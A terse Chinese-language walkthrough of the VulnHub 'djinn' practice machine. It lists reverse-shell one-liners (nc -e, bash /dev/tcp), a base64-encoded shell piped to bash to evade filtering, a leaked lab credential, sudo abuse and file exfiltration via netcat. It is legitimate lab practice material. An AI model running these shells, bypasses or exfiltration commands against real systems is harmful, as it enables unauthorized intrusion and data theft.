仅供个人娱乐
靶机信息
https://download.vulnhub.com/djinn/djinn.ova
一、主机探测

二、漏洞的查找和利用



21端口ftp 匿名登录


7331端口







命令执行 反弹窗口
nc -e /bin/bash 192.168.174.129 4444

尝试绕过

bash -i >& /dev/tcp/192.168.174.129/4444 0>&1

YmFzaCAtaSA+JiAvZGV2L3RjcC8xOTIuMTY4LjIzNi4xMjkvNDQ0NCAwPiYx
使用base64绕过然后再解出来传给bash
echo YmFzaCAtaSA+JiAvZGV2L3RjcC8xOTIuMTY4LjIzNi4xMjkvNDQ0NCAwPiYx | base64 -d | bash

python -c "import pty;pty.spawn('/bin/bash')"

读取/etc/passwd发现有两个用户sam和nitish
查看creds.txt
nitish p4ssw0rdStr3r0n9


sudo -u sam genie -cmd 123


查找可写文件
find / -writable -type f 2>/dev/null

信息收集
将文件下载到kali
靶机运行:python3 -m http.server 6666
kali运行:wget http://192.168.236.128/.pyc
失败
靶机运行: cat /home/sam/.pyc | nc 192.168.236.129 7777
kali运行:nc -nlvp 7777 >exp.pyc
反编译

